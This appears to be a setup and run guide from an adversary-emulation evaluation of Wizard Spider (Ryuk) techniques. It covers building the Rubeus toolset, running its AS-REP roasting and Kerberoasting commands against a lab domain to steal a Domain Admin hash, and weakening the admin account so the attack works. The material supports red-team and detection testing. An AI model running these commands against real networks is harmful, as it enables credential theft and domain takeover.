"Rubeus is a C# toolset for raw Kerberos interaction and abuses."

The goal for this evaluation is to steal the hash of the Domain Admin as a Domain User.

Open the command prompt (cmd.exe), navigate to directory containing the Rubeus Visual Studio solution file (Rubeus.sln), and run the devenv.exe command:

cd wizard_spider\Resources\Rubeus "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe" Rubeus.sln /build Release

"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\msbuild.exe" Rubeus.sln -property:Configuration=Release

The executable will be found in the bin\Release folder.

Open PowerShell

cd wizard_spider\Resources\Rubeus
rubeus_test.ps1

rubeus.exe asreproast /domain:oz.local

rubeus.exe kerberoast /domain:oz.local

Open a command prompt or PowerShell

del rubeus.exe

Conditions required to successfully compromise the Domain Admin password via Kerberoasting during the evaluation:

• The Domain Admin must have a crackable password

• The Domain Admin must have a Service Principal Name (SPN) associated with their account

# Example command to set the SPN:
setspn -s exchange/oz.local oz/kfleming

Additionally, the CTI indicates the adversary also attempts AS-Rep Roasting. For this to work, Kerberos pre-authentication must be disabled (not done by default).

Log into Domain Controller
Run (Windows-R) dsa.msc
Select Domain Admin account
Go to the Account tab
In account options, check 'Do not require Kerberos preauthentication'

https://attack.mitre.org/groups/G0102/ https://thedfirreport.com/2020/10/08/ryuks-return/ https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://github.com/GhostPack/Rubeus https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spn-setspn-syntax.aspx https://blog.zsec.uk/path2da-pt2/ https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019